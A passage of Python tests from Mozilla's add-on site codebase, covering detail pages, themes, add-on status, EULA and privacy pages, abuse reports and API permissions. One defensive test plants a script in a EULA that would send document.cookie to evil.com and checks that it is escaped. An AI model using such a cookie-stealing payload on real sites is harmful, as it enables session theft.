numberfmt(self.addon.weekly_downloads) # Check if we hide link when there are no weekly downloads. self.addon.update(weekly_downloads=0) assert self.get_pq()('#weekly-downloads').length == 0 def test_downloads_stats_regular(self): self.addon.update(type=amo.ADDON_SEARCH) self.client.login(email='regular@mozilla.com') # Should not be a link to statistics dashboard for regular users. dls = self.get_pq()('#weekly-downloads') assert dls.length == 1 assert dls.find('a').length == 0 def test_downloads_stats_admin(self): self.addon.update(public_stats=True, type=amo.ADDON_SEARCH) self.client.login(email='del@icio.us') # Check link to statistics dashboard for add-on authors. assert self.get_pq()('#weekly-downloads a.stats').attr('href') == ( reverse('stats.overview', args=[self.addon.slug])) def test_dependencies(self): assert self.get_pq()('.dependencies').length == 0 req = Addon.objects.get(id=592) AddonDependency.objects.create(addon=self.addon, dependent_addon=req) assert self.addon.all_dependencies == [req] cache.clear() d = self.get_pq()('.dependencies .hovercard') assert d.length == 1 assert d.find('h3').text() == unicode(req.name) assert d.find('a').attr('href').endswith('?src=dp-dl-dependencies') assert d.find('.install-button a').attr('href').endswith( '?src=dp-hc-dependencies') def test_license_link_builtin(self): g = 'http://google.com' version = self.addon._current_version license = version.license license.builtin = 1 license.name = 'License to Kill' license.url = g license.save() assert license.builtin == 1 assert license.url == g a = self.get_pq()('.secondary.metadata .source-license a') assert a.attr('href') == g assert a.text() == 'License to Kill' def test_license_builtin_creative_commons(self): g = 'http://google.com' version = self.addon._current_version constant = LICENSES_BY_BUILTIN[11] license = version.license license.builtin = 11 license.name = 'License to Kill' # Will be overriden by constant license.url = g license.save() assert license._constant == constant assert license.builtin == 11 assert license.url == g a = self.get_pq()('.secondary.metadata .source-license a') assert a.attr('href') == g assert a.text() == constant.name def test_license_link_custom(self): version = self.addon._current_version assert version.license.url is None a = self.get_pq()('.secondary.metadata .source-license a') assert a.attr('href') == version.license_url() assert a.attr('target') is None assert a.text() == 'Custom License' def get_more_pq(self): return pq(self.client.get_ajax(self.more_url).content) def test_other_addons(self): """Ensure listed add-ons by the same author show up.""" other = Addon.objects.get(id=592) Addon.objects.get(id=4594).delete() assert list(Addon.objects.listed(amo.FIREFOX).exclude( id=self.addon.id)) == [other] add_addon_author(other, self.addon) doc = self.get_more_pq()('#author-addons') _test_hovercards(self, doc, [other], src='dp-dl-othersby') def test_other_addons_no_unlisted(self): """An unlisted add-on by the same author should not show up.""" other = Addon.objects.get(id=592) other.update(status=amo.STATUS_NOMINATED, disabled_by_user=True) add_addon_author(other, self.addon) assert self.get_more_pq()('#author-addons').length == 0 def test_other_addons_by_others(self): """Add-ons by different authors should not show up.""" author = UserProfile.objects.get(pk=999) AddonUser.objects.create(addon=self.addon, user=author, listed=True) assert self.get_more_pq()('#author-addons').length == 0 def test_other_addons_none(self): assert self.get_more_pq()('#author-addons').length == 0 def test_categories(self): links = self.get_more_pq()('#related ul:first').find('a') expected = [(unicode(c.name), c.get_url_path()) for c in self.addon.categories.filter( application=amo.FIREFOX.id)] amo.tests.check_links(expected, links) def test_static_theme_detail(self): self.addon.update(type=amo.ADDON_STATICTHEME) version_preview = VersionPreview.objects.create( version=self.addon.current_version) response = self.client.get(self.url) assert response.status_code == 200 doc = pq(response.content) assert doc('.previews') assert len(doc('.previews li.panel')) == 1 img = doc('.previews li.panel img')[0] assert img.attrib['src'] == version_preview.thumbnail_url class TestPersonas(object): fixtures = ['addons/persona', 'base/users'] def create_addon_user(self, addon): return AddonUser.objects.create(addon=addon, user_id=999) # Overwrite the caches setting to a MemcachedCache backend to test a # regression that caused cache-keys to be longer than 250 characters # https://github.com/mozilla/addons-server/issues/8598 cache_settings = settings.CACHES.copy() cache_settings['default'] = { 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache', 'LOCATION': os.environ.get('MEMCACHE_LOCATION', 'localhost:11211'), } @override_settings(CACHES=cache_settings) class TestPersonaDetailPage(TestPersonas, TestCase): def setUp(self): super(TestPersonas, self).setUp() self.addon = Addon.objects.get(id=15663) self.persona = self.addon.persona self.url = self.addon.get_url_path() self.create_addon_user(self.addon) def test_persona_images(self): r = self.client.get(self.url) doc = pq(r.content) assert doc('h2.addon img').attr('src') == self.persona.icon_url style = doc('#persona div[data-browsertheme]').attr('style') assert self.persona.preview_url in style, ( 'style attribute %s does not link to %s' % ( style, self.persona.preview_url)) def test_more_personas(self): other = addon_factory(type=amo.ADDON_PERSONA) self.create_addon_user(other) r = self.client.get(self.url) assert pq(r.content)('#more-artist .more-link').length == 1 def test_not_personas(self): other = addon_factory(type=amo.ADDON_EXTENSION) self.create_addon_user(other) r = self.client.get(self.url) assert pq(r.content)('#more-artist .more-link').length == 0 def test_new_more_personas(self): other = addon_factory(type=amo.ADDON_PERSONA) self.create_addon_user(other) self.persona.persona_id = 0 self.persona.save() r = self.client.get(self.url) profile = UserProfile.objects.get(id=999).get_url_path() assert pq(r.content)('#more-artist .more-link').attr('href') == ( profile + '?src=addon-detail') def test_other_personas(self): """Ensure listed personas by the same author show up.""" addon_factory(type=amo.ADDON_PERSONA, status=amo.STATUS_NULL) addon_factory(type=amo.ADDON_PERSONA, status=amo.STATUS_PUBLIC) addon_factory(type=amo.ADDON_PERSONA, disabled_by_user=True) other = addon_factory(type=amo.ADDON_PERSONA) self.create_addon_user(other) assert other.status == amo.STATUS_PUBLIC assert not other.disabled_by_user r = self.client.get(self.url) assert list(r.context['author_personas']) == [other] a = pq(r.content)('#more-artist .persona.hovercard > a') assert a.length == 1 assert a.attr('href') == other.get_url_path() def _test_by(self): """Test that the by... bit works.""" r = self.client.get(self.url) assert pq(r.content)('h4.author').text().startswith('by regularuser') def test_by(self): self._test_by() def test_personas_categories(self): static_category = ( CATEGORIES[amo.FIREFOX.id][amo.ADDON_PERSONA]['film-and-tv']) category = Category.from_static_category(static_category, True) AddonCategory.objects.create(addon=self.addon, category=category) r = self.client.get(self.url) assert ( pq(r.content)('#more-category>h3').text() == 'More Film and TV Themes') class TestStatus(TestCase): fixtures = ['base/addon_3615', 'addons/persona'] def setUp(self): super(TestStatus, self).setUp() self.addon = Addon.objects.get(id=3615) self.version = self.addon.current_version self.file = self.version.all_files[0] assert self.addon.status == amo.STATUS_PUBLIC self.url = self.addon.get_url_path() self.persona = Addon.objects.get(id=15663) assert self.persona.status == amo.STATUS_PUBLIC self.persona_url = self.persona.get_url_path() def test_incomplete(self): self.addon.update(status=amo.STATUS_NULL) assert self.client.get(self.url).status_code == 404 def test_pending(self): self.addon.update(status=amo.STATUS_PENDING) assert self.client.get(self.url).status_code == 404 def test_nominated(self): self.addon.update(status=amo.STATUS_NOMINATED) assert self.client.get(self.url).status_code == 200 def test_public(self): self.addon.update(status=amo.STATUS_PUBLIC) assert self.client.get(self.url).status_code == 200 def test_deleted(self): self.addon.update(status=amo.STATUS_DELETED) assert self.client.get(self.url).status_code == 404 def test_disabled(self): self.addon.update(status=amo.STATUS_DISABLED) assert self.client.get(self.url).status_code == 404 def test_disabled_by_user(self): self.addon.update(disabled_by_user=True) assert self.client.get(self.url).status_code == 404 def test_persona(self): for status in Persona.STATUS_CHOICES.keys(): if status == amo.STATUS_DELETED: continue self.persona.status = status self.persona.save() assert self.client.head(self.persona_url).status_code == ( 200 if status in [amo.STATUS_PUBLIC, amo.STATUS_PENDING] else 404) def test_persona_disabled(self): for status in Persona.STATUS_CHOICES.keys(): if status == amo.STATUS_DELETED: continue self.persona.status = status self.persona.disabled_by_user = True self.persona.save() assert self.client.head(self.persona_url).status_code == 404 class TestTagsBox(TestCase): fixtures = ['base/addontag'] def test_tag_box(self): """Verify that we don't show duplicate tags.""" r = self.client.get_ajax(reverse('addons.detail_more', args=[8680]), follow=True) doc = pq(r.content) assert 'SEO' == doc('#tagbox ul').children().text() class TestEulaPolicyRedirects(TestCase): def test_eula_legacy_url(self): """ See that we get a 301 to the zamboni style URL """ response = self.client.get('/en-US/firefox/addons/policy/0/592/42') assert response.status_code == 301 assert (response['Location'].find('/addon/592/eula/42') != -1) def test_policy_legacy_url(self): """ See that we get a 301 to the zamboni style URL """ response = self.client.get('/en-US/firefox/addons/policy/0/592/') assert response.status_code == 301 assert (response['Location'].find('/addon/592/privacy/') != -1) class TestEula(TestCase): fixtures = ['addons/eula+contrib-addon'] def setUp(self): super(TestEula, self).setUp() self.addon = Addon.objects.get(id=11730) self.url = self.get_url() def get_url(self, args=None): if args is None: args = [] return reverse('addons.eula', args=[self.addon.slug] + args) def test_current_version(self): r = self.client.get(self.url) assert r.context['version'] == self.addon.current_version def test_simple_html_is_rendered(self): self.addon.eula = """ <strong> what the hell..</strong> <ul> <li>papparapara</li> <li>todotodotodo</li> </ul> <ol> <a href="irc://irc.mozilla.org/firefox">firefox</a> Introduce yourself to the community, if you like! This text will appear publicly on your user info page. <li>papparapara2</li> <li>todotodotodo2</li> </ol> """ self.addon.save() r = self.client.get(self.url) doc = pq(r.content) assert norm(doc('.policy-statement strong')) == ( '<strong> what the hell..</strong>') assert norm(doc('.policy-statement ul')) == ( '<ul><li>papparapara</li><li>todotodotodo</li></ul>') assert doc('.policy-statement ol a').text() == 'firefox' assert norm(doc('.policy-statement ol li:first')) == ( '<li>papparapara2</li>') def test_evil_html_is_not_rendered(self): self.addon.eula = """ <script type="text/javascript"> window.location = 'http://evil.com/?c=' + document.cookie; </script> Muhuhahahahahahaha! """ self.addon.save() r = self.client.get(self.url) doc = pq(r.content) policy = str(doc('.policy-statement')) assert policy.startswith('<div class="policy-statement">&lt;script'), ( 'Unexpected: %s' % policy[:50]) def test_old_version(self): old = self.addon.versions.order_by('created')[0] assert old != self.addon.current_version r = self.client.get(self.get_url([old.all_files[0].id])) assert r.context['version'] == old def test_deleted_version(self): old = self.addon.versions.order_by('created')[0] assert old != self.addon.current_version old.delete() response = self.client.get(self.get_url([old.all_files[0].id])) assert response.status_code == 404 def test_redirect_no_eula(self): self.addon.update(eula=None) r = self.client.get(self.url, follow=True) self.assert3xx(r, self.addon.get_url_path()) def test_cat_sidebar(self): check_cat_sidebar(self.url, self.addon) class TestXssOnName(amo.tests.TestXss): def test_eula_page(self): url = reverse('addons.eula', args=[self.addon.slug]) self.assertNameAndNoXSS(url) def test_detail_page(self): url = reverse('addons.detail', args=[self.addon.slug]) self.assertNameAndNoXSS(url) def test_privacy_page(self): url = reverse('addons.privacy', args=[self.addon.slug]) self.assertNameAndNoXSS(url) def test_reviews_list(self): url = reverse('addons.ratings.list', args=[self.addon.slug]) self.assertNameAndNoXSS(url) def test_reviews_add(self): url = reverse('addons.ratings.add', args=[self.addon.slug]) self.client.login(email='fligtar@gmail.com') self.assertNameAndNoXSS(url) class TestPrivacyPolicy(TestCase): fixtures = ['addons/eula+contrib-addon'] def setUp(self): super(TestPrivacyPolicy, self).setUp() self.addon = Addon.objects.get(id=11730) self.url = reverse('addons.privacy', args=[self.addon.slug]) def test_redirect_no_eula(self): assert self.addon.privacy_policy is None r = self.client.get(self.url, follow=True) self.assert3xx(r, self.addon.get_url_path()) def test_cat_sidebar(self): self.addon.privacy_policy = 'shizzle' self.addon.save() check_cat_sidebar(self.url, self.addon) @patch.object(settings, 'NOBOT_RECAPTCHA_PRIVATE_KEY', 'something') class TestReportAbuse(TestCase): fixtures = ['addons/persona', 'base/addon_3615', 'base/users'] def setUp(self): super(TestReportAbuse, self).setUp() self.full_page = reverse('addons.abuse', args=['a3615']) @patch('olympia.amo.fields.ReCaptchaField.clean') def test_abuse_anonymous(self, clean): clean.return_value = "" self.client.post(self.full_page, {'text': 'spammy'}) assert len(mail.outbox) == 1 assert 'spammy' in mail.outbox[0].body report = AbuseReport.objects.get(addon=3615) assert report.message == 'spammy' assert report.reporter is None def test_abuse_anonymous_fails(self): r = self.client.post(self.full_page, {'text': 'spammy'}) assert 'recaptcha' in r.context['abuse_form'].errors def test_abuse_logged_in(self): self.client.login(email='regular@mozilla.com') self.client.post(self.full_page, {'text': 'spammy'}) assert len(mail.outbox) == 1 assert 'spammy' in mail.outbox[0].body report = AbuseReport.objects.get(addon=3615) assert report.message == 'spammy' assert report.reporter.email == 'regular@mozilla.com' def test_abuse_name(self): addon = Addon.objects.get(pk=3615) addon.name = 'Bmrk.ru Социальные закладки' addon.save() self.client.login(email='regular@mozilla.com') self.client.post(self.full_page, {'text': 'spammy'}) assert 'spammy' in mail.outbox[0].body assert AbuseReport.objects.get(addon=addon) def test_abuse_persona(self): shared_url = reverse('addons.detail', args=['a15663']) r = self.client.get(shared_url) doc = pq(r.content) assert doc("fieldset.abuse") # and now just test it works self.client.login(email='regular@mozilla.com') r = self.client.post(reverse('addons.abuse', args=['a15663']), {'text': 'spammy'}) self.assert3xx(r, shared_url) assert len(mail.outbox) == 1 assert 'spammy' in mail.outbox[0].body assert AbuseReport.objects.get(addon=15663) class TestFindReplacement(TestCase): def test_no_match(self): self.url = reverse('addons.find_replacement') + '?guid=xxx' response = self.client.get(self.url) self.assert3xx( response, DEFAULT_FIND_REPLACEMENT_PATH + '?src=%s' % FIND_REPLACEMENT_SRC) def test_match(self): addon_factory(slug='replacey') ReplacementAddon.objects.create(guid='xxx', path='/addon/replacey/') self.url = reverse('addons.find_replacement') + '?guid=xxx' response = self.client.get(self.url) self.assert3xx( response, '/addon/replacey/?src=%s' % FIND_REPLACEMENT_SRC) def test_match_no_leading_slash(self): addon_factory(slug='replacey') ReplacementAddon.objects.create(guid='xxx', path='addon/replacey/') self.url = reverse('addons.find_replacement') + '?guid=xxx' response = self.client.get(self.url) self.assert3xx( response, '/addon/replacey/?src=%s' % FIND_REPLACEMENT_SRC) def test_no_guid_param_is_404(self): self.url = reverse('addons.find_replacement') response = self.client.get(self.url) assert response.status_code == 404 def test_external_url(self): ReplacementAddon.objects.create( guid='xxx', path='https://mozilla.org/') self.url = reverse('addons.find_replacement') + '?guid=xxx' response = self.client.get(self.url) self.assert3xx( response, get_outgoing_url('https://mozilla.org/')) class AddonAndVersionViewSetDetailMixin(object): """Tests that play with addon state and permissions. Shared between addon and version viewset detail tests since both need to react the same way.""" def _test_url(self): raise NotImplementedError def _set_tested_url(self, param): raise NotImplementedError def test_get_by_id(self): self._test_url() def test_get_by_slug(self): self._set_tested_url(self.addon.slug) self._test_url() def test_get_by_guid(self): self._set_tested_url(self.addon.guid) self._test_url() def test_get_by_guid_uppercase(self): self._set_tested_url(self.addon.guid.upper()) self._test_url() def test_get_by_guid_email_format(self): self.addon.update(guid='my-addon@example.tld') self._set_tested_url(self.addon.guid) self._test_url() def test_get_by_guid_email_short_format(self): self.addon.update(guid='@example.tld') self._set_tested_url(self.addon.guid) self._test_url() def test_get_by_guid_email_really_short_format(self): self.addon.update(guid='@example') self._set_tested_url(self.addon.guid) self._test_url() def test_get_not_public_anonymous(self): self.addon.update(status=amo.STATUS_NOMINATED) response = self.client.get(self.url) assert response.status_code == 401 data = json.loads(response.content) assert data['detail'] == ( 'Authentication credentials were not provided.') assert data['is_disabled_by_developer'] is False assert data['is_disabled_by_mozilla'] is False def test_get_not_public_no_rights(self): self.addon.update(status=amo.STATUS_NOMINATED) user = UserProfile.objects.create(username='simpleuser') self.client.login_api(user) response = self.client.get(self.url) assert response.status_code == 403 data = json.loads(response.content) assert data['detail'] == ( 'You do not have permission to perform this action.') assert data['is_disabled_by_developer'] is False assert data['is_disabled_by_mozilla'] is False def test_get_not_public_reviewer(self): self.addon.update(status=amo.STATUS_NOMINATED) user = UserProfile.objects.create(username='reviewer') self.grant_permission(user, 'Addons:Review') self.client.login_api(user) response = self.client.get(self.url) assert response.status_code == 200 def test_get_not_public_author(self): self.addon.update(status=amo.STATUS_NOMINATED) user = UserProfile.objects.create(username='author') AddonUser.objects.create(user=user, addon=self.addon) self.client.login_api(user) response = self.client.get(self.url) assert response.status_code == 200 def test_get_disabled_by_user_anonymous(self): self.addon.update(disabled_by_user=True) response = self.client.get(self.url) assert response.status_code == 401 data = json.loads(response.content) assert data['detail'] == ( 'Authentication credentials were not provided.') assert data['is_disabled_by_developer'] is True assert data['is_disabled_by_mozilla'] is False def test_get_disabled_by_user_other_user(self): self.addon.update(disabled_by_user=True) user = UserProfile.objects.create(username='someone') self.client.login_api(user) response = self.client.get(self.url) assert response.status_code == 403 data = json.loads(response.content) assert data['detail'] == ( 'You do not have permission to perform this action.') assert data['is_disabled_by_developer'] is True assert data['is_disabled_by_mozilla'] is False def test_disabled_by_admin_anonymous(self): self.addon.update(status=amo.STATUS_DISABLED) response = self.client.get(self.url) assert response.status_code == 401 data = json.loads(response.content) assert data['detail'] == ( 'Authentication credentials were not provided.') assert data['is_disabled_by_developer'] is False assert data['is_disabled_by_mozilla'] is True def test_disabled_by_admin_no_rights(self): self.addon.update(status=amo.STATUS_DISABLED) user = UserProfile.objects.create(username='someone') self.client.login_api(user) response = self.client.get(self.url) assert response.status_code == 403 data = json.loads(response.content) assert data['detail'] == ( 'You do not have permission to perform this action.') assert data['is_disabled_by_developer'] is False assert data['is_disabled_by_mozilla'] is True def test_get_not_listed(self): self.make_addon_unlisted(self.addon) response = self.client.get(self.url) assert response.status_code == 401 data = json.loads(response.content) assert data['detail'] == ( 'Authentication credentials were not provided.') assert data['is_disabled_by_developer'] is False assert data['is_disabled_by_mozilla'] is False def test_get_not_listed_no_rights(self): user = UserProfile.objects.create(username='simpleuser') self.make_addon_unlisted(self.addon) self.client.login_api(user) response = self.client.get(self.url) assert response.status_code == 403 data = json.loads(response.content) assert data['detail'] == ( 'You do not have permission to perform this action.') assert data['is_disabled_by_developer'] is False assert data['is_disabled_by_mozilla'] is False def test_get_not_listed_simple_reviewer(self): user = UserProfile.objects.create(username='reviewer') self.grant_permission(user, 'Addons:Review') self.make_addon_unlisted(self.addon) self.client.login_api(user) response = self.client.get(self.url) assert response.status_code == 403 data = json.loads(response.content) assert data['detail'] == ( 'You do not have permission to perform this action.') assert data['is_disabled_by_developer'] is False assert data['is_disabled_by_mozilla'] is False def test_get_not_listed_specific_reviewer(self): user = UserProfile.objects.create(username='reviewer') self.grant_permission(user, 'Addons:ReviewUnlisted') self.make_addon_unlisted(self.addon) self.client.login_api(user) response = self.client.get(self.url) assert response.status_code == 200 def test_get_not_listed_author(self): user = UserProfile.objects.create(username='author') AddonUser.objects.create(user=user, addon=self.addon) self.make_addon_unlisted(self.addon) self.client.login_api(user) response = self.client.get(self.url) assert response.status_code == 200 def test_get_deleted(self): self.addon.delete() response = self.client.get(self.url) assert response.status_code == 404 data = json.loads(response.content) assert data['detail'] == 'Not found.' # `is_disabled_by_developer` and `is_disabled_by_mozilla` are only # added for 401/403. assert 'is_disabled_by_developer' not in data assert 'is_disabled_by_mozilla' not in data def test_get_deleted_no_rights(self): self.addon.delete() user = UserProfile.objects.create(username='simpleuser') self.client.login_api(user) response = self.client.get(self.url) assert response.status_code == 404 data = json.loads(response.content) assert data['detail'] == 'Not found.' # `is_disabled_by_developer` and `is_disabled_by_mozilla` are only # added for 401/403. assert 'is_disabled_by_developer' not in data assert 'is_disabled_by_mozilla' not in data def test_get_deleted_reviewer(self): user = UserProfile.objects.create(username='reviewer') self.grant_permission(user, 'Addons:Review') self.addon.delete() self.client.login_api(user) response = self.client.get(self.url) assert response.status_code == 404 data = json.loads(response.content) assert data['detail'] == 'Not found.' # `is_disabled_by_developer` and `is_disabled_by_mozilla` are only # added for 401/403. assert 'is_disabled_by_developer' not in data assert 'is_disabled_by_mozilla' not in data def test_get_deleted_admin(self): user = UserProfile.objects.create(username='admin') self.grant_permission(user, 'Addons:ViewDeleted,Addons:Review') self.addon.delete() self.client.login_api(user) response = self.client.get(self.url) assert response.status_code == 200 def test_get_deleted_author(self): # Owners can't see their own add-on once deleted, only admins can. user = UserProfile.objects.create(username='author') AddonUser.objects.create(user=user, addon=self.addon) self.addon.delete() self.client.login_api(user) response = self.client.get(self.url) assert response.status_code == 404 data = json.loads(response.content) assert data['detail'] == 'Not found.' # `is_disabled_by_developer` and `is_disabled_by_mozilla` are only # added for 401/403. assert 'is_disabled_by_developer' not in data assert 'is_disabled_by_mozilla' not in data def test_get_addon_not_found(self): self._set_tested_url(self.addon.pk + 42) response = self.client.get(self.url) assert response.status_code == 404 data = json.loads(response.content) assert data['detail'] == 'Not found.' # `is_disabled_by_developer` and `is_disabled_by_mozilla` are only # added for 401/403. assert 'is_disabled_by_developer' not in data assert 'is_disabled_by_mozilla' not in data class TestAddonViewSetDetail(AddonAndVersionViewSetDetailMixin, TestCase): client_class = APITestClient def setUp(self): super(TestAddonViewSetDetail, self).setUp() self.addon = addon_factory( guid=generate_addon_guid(), name=u'My Addôn', slug='my-addon') self._set_tested_url(self.addon.pk) def _test_url(self): response = self.client.get(self.url) assert response.status_code == 200 result = json.loads(response.content) assert result['id'] == self.addon.pk assert result['name'] == {'en-US': u'My Addôn'} assert result['slug'] == self.addon.slug assert result['last_updated'] == ( self.addon.last_updated.replace(microsecond=0).isoformat() + 'Z') return result def _set_tested_url(self, param): self.url = reverse_ns('addon-detail', kwargs={'pk': param}) def test_detail_url_with_reviewers_in_the_url(self): self.addon.update(slug='something-reviewers') self.url = reverse_ns('addon-detail', kwargs={'pk': self.addon.slug}) self._test_url() def test_hide_latest_unlisted_version_anonymous(self): unlisted_version = version_factory( addon=self.addon, channel=amo.RELEASE_CHANNEL_UNLISTED) unlisted_version.update(created=self.days_ago(1)) result = self._test_url() assert 'latest_unlisted_version' not in result def test_hide_latest_unlisted_version_simple_reviewer(self): user = UserProfile.objects.create(username='reviewer') self.grant_permission(user, 'Addons:Review') self.client.login_api(user) unlisted_version = version_factory( addon=self.addon, channel=amo.RELEASE_CHANNEL_UNLISTED) unlisted_version.update(created=self.days_ago(1)) result = self._test_url() assert 'latest_unlisted_version' not in result def test_show_latest_unlisted_version_author(self): user = UserProfile.objects.create(username='author') AddonUser.objects.create(user=user, addon=self.addon) self.client.login_api(user) unlisted_version = version_factory( addon=self.addon, channel=amo.RELEASE_CHANNEL_UNLISTED) unlisted_version.update(created=self.days_ago(1)) result = self._test_url() assert result['latest_unlisted_version'] assert result['latest_unlisted_version']['id'] == unlisted_version.pk def test_show_latest_unlisted_version_unlisted_reviewer(self): user = UserProfile.objects.create(username='author') self.grant_permission(user, 'Addons:ReviewUnlisted') self.client.login_api(user) unlisted_version = version_factory( addon=self.addon, channel=amo.RELEASE_CHANNEL_UNLISTED) unlisted_version.update(created=self.days_ago(1)) result = self._test_url() assert result['latest_unlisted_version'] assert result['latest_unlisted_version']['id'] == unlisted_version.pk def test_with_lang(self): self.addon.name = { 'en-US': u'My Addôn, mine', 'fr': u'Mon Addôn, le mien', } self.addon.save() response = self.client.get(self.url, {'lang': 'en-US'}) assert response.status_code == 200 result = json.loads(response.content) assert result['id'] == self.addon.pk assert result['name'] == u'My Addôn, mine' response = self.client.get(self.url, {'lang': 'fr'}) assert response.status_code == 200 result = json.loads(response.content) assert result['id'] == self.addon.pk assert result['name'] == u'Mon Addôn, le mien' response = self.client.get(self.url, {'lang': 'en-US'}) assert response.status_code == 200 result = json.loads(response.content) assert result['id'] == self.addon.pk assert result['name'] == u'My Addôn, mine' class TestVersionViewSetDetail(AddonAndVersionViewSetDetailMixin, TestCase): client_class = APITestClient def setUp(self): super(TestVersionViewSetDetail, self).setUp() self.addon = addon_factory( guid=generate_addon_guid(), name=u'My Addôn', slug='my-addon') # Don't use addon.current_version, changing its state as we do in # the tests might render the add-on itself inaccessible. self.version = version_factory(addon=self.addon) self._set_tested_url(self.addon.pk) def _test_url(self): response = self.client.get(self.url) assert response.status_code == 200 result = json.loads(response.content) assert result['id'] == self.version.pk assert result['version'] == self.version.version def _set_tested_url(self, param): self.url = reverse_ns('addon-version-detail', kwargs={ 'addon_pk': param, 'pk': self.version.pk}) def test_version_get_not_found(self): self.url = reverse_ns('addon-version-detail', kwargs={ 'addon_pk': self.addon.pk, 'pk': self.version.pk + 42}) response = self.client.get(self.url) assert response.status_code == 404 def test_disabled_version_reviewer(self): user = UserProfile.objects.create(username='reviewer') self.grant_permission(user, 'Addons:Review') self.client.login_api(user) self.version.files.update(status=amo.STATUS_DISABLED) self._test_url() def test_disabled_version_author(self): user = UserProfile.objects.create(username='author') AddonUser.objects.create(user=user, addon=self.addon) self.client.login_api(user) self.version.files.update(status=amo.STATUS_DISABLED) self._test_url() def test_disabled_version_admin(self): user = UserProfile.objects.create(username='admin') self.grant_permission(user, '*:*') self.client.login_api(user) self.version.files.update(status=amo.STATUS_DISABLED) self._test_url() def test_disabled_version_anonymous(self): self.version.files.update(status=amo.STATUS_DISABLED) response = self.client.get(self.url) assert response.status_code == 401 def test_disabled_version_user_but_not_author(self): user = UserProfile.objects.create(username='simpleuser') self.client.login_api(user) self.version.files.update(status=amo.STATUS_DISABLED) response = self.client.get(self.url) assert response.status_code == 403 def test_deleted_version_reviewer(self): user = UserProfile.objects.create(username='reviewer') self.grant_permission(user, 'Addons:Review') self.client.login_api(user) self.version.delete() response = self.client.get(self.url) assert response.status_code == 404 def test_deleted_version_author(self): user = UserProfile.objects.create(username='author') AddonUser.objects.create(user=user, addon=self.addon) self.client.login_api(user) self.version.delete() response = self.client.get(self.url) assert response.status_code == 404 def test_deleted_version_admin(self): user = UserProfile.objects.create(username='admin') self.grant_permission(user, '*:*') self.client.login_api(user) self.version.delete() self._test_url() def test_deleted_version_anonymous(self): self.version.delete() response = self.client.get(self.url) assert response.status_code == 404 def test_deleted_version_user_but_not_author(self): user = UserProfile.objects.create(username='simpleuser') self.client.login_api(user) self.version.delete() response = self.client.get(self.url) assert response.status_code == 404 def test_unlisted_version_reviewer(self): user = UserProfile.objects.create(username='reviewer') self.grant_permission(user, 'Addons:Review') self.client.login_api(user) self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED) response = self.client.get(self.url) assert response.status_code == 403 def test_unlisted_version_unlisted_reviewer(self): user = UserProfile.objects.create(username='reviewer') self.grant_permission(user, 'Addons:ReviewUnlisted') self.client.login_api(user) self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED) self._test_url() def test_unlisted_version_author(self): user = UserProfile.objects.create(username='author') AddonUser.objects.create(user=user, addon=self.addon) self.client.login_api(user) self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED) self._test_url() def test_unlisted_version_admin(self): user = UserProfile.objects.create(username='admin') self.grant_permission(user, '*:*') self.client.login_api(user) self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED) self._test_url() def test_unlisted_version_anonymous(self): self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED) response = self.client.get(self.url) assert response.status_code == 401 def test_unlisted_version_user_but_not_author(self): user = UserProfile.objects.create(username='simpleuser') self.client.login_api(user) self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED) response = self.client.get(self.url) assert response.status_code == 403 class TestVersionViewSetList(AddonAndVersionViewSetDetailMixin, TestCase): client_class = APITestClient def setUp(self): super(TestVersionViewSetList, self).setUp() self.addon = addon_factory( guid=generate_addon_guid(), name=u'My Addôn', slug='my-addon') self.old_version = self.addon.current_version self.old_version.update(created=self.days_ago(2)) # Don't use addon.current_version, changing its state as we do in # the tests might render the add-on itself inaccessible. self.version = version_factory(addon=self.addon, version='1.0.1') self.version.update(created=self.days_ago(1)) # This version is unlisted and should be hidden by default, only # shown when requesting to see unlisted stuff explicitly, with the # right permissions. self.unlisted_version = version_factory( addon=self.addon, version='42.0', channel=amo.RELEASE_CHANNEL_UNLISTED) self._set_tested_url(self.addon.pk) def _test_url(self, **kwargs): response = self.client.get(self.url, data=kwargs) assert response.status_code == 200 result = json.loads(response.content) assert result['results'] assert len(result['results']) == 2 result_version = result['results'][0] assert result_version['id'] == self.version.pk assert result_version['version'] == self.version.version result_version = result['results'][1] assert result_version['id'] == self.old_version.pk assert result_version['version'] == self.old_version.version def _test_url_contains_all(self, **kwargs): response = self.client.get(self.url, data=kwargs) assert response.status_code == 200 result = json.loads(response.content) assert result['results'] assert len(result['results']) == 3 result_version = result['results'][0] assert result_version['id'] == self.unlisted_version.pk assert result_version['version'] == self.unlisted_version.version result_version = result['results'][1] assert result_version['id'] == self.version.pk assert result_version['version'] == self.version.version result_version = result['results'][2] assert result_version['id'] == self.old_version.pk assert result_version['version'] == self.old_version.version def _test_url_only_contains_old_version(self, **kwargs): response = self.client.get(self.url, data=kwargs) assert response.status_code == 200 result = json.loads(response.content) assert result['results'] assert len(result['results']) == 1 result_version = result['results'][0] assert result_version['id'] == self.old_version.pk assert result_version['version'] == self.old_version.version def _set_tested_url(self, param): self.url = reverse_ns('addon-version-list', kwargs={'addon_pk': param}) def test_bad_filter(self): response = self.client.get(self.url, data={'filter': 'ahahaha'}) assert response.status_code == 400 data = json.loads(response.content) assert data == ['Invalid "filter" parameter specified.'] def test_disabled_version_reviewer(self): user = UserProfile.objects.create(username='reviewer') self.grant_permission(user, 'Addons:Review') self.client.login_api(user) self.version.files.update(status=amo.STATUS_DISABLED) self._test_url_only_contains_old_version() # A reviewer can see disabled versions when explicitly asking for them. self._test_url(filter='all_without_unlisted') def test_disabled_version_author(self): user = UserProfile.objects.create(username='author') AddonUser.objects.create(user=user, addon=self.addon) self.client.login_api(user) self.version.files.update(status=amo.STATUS_DISABLED) self._test_url_only_contains_old_version() # An author can see disabled versions when explicitly asking for them. self._test_url(filter='all_without_unlisted') def test_disabled_version_admin(self): user = UserProfile.objects.create(username='admin') self.grant_permission(user, '*:*') self.client.login_api(user) self.version.files.update(status=amo.STATUS_DISABLED) self._test_url_only_contains_old_version() # An admin can see disabled versions when explicitly asking for them. self._test_url(filter='all_without_unlisted') def test_disabled_version_anonymous(self): self.version.files.update(status=amo.STATUS_DISABLED) self._test_url_only_contains_old_version() response = self.client.get( self.url, data={'filter': 'all_without_unlisted'}) assert response.status_code == 401 response = self.client.get( self.url, data={'filter': 'all_with_deleted'}) assert response.status_code == 401 def test_disabled_version_user_but_not_author(self): user = 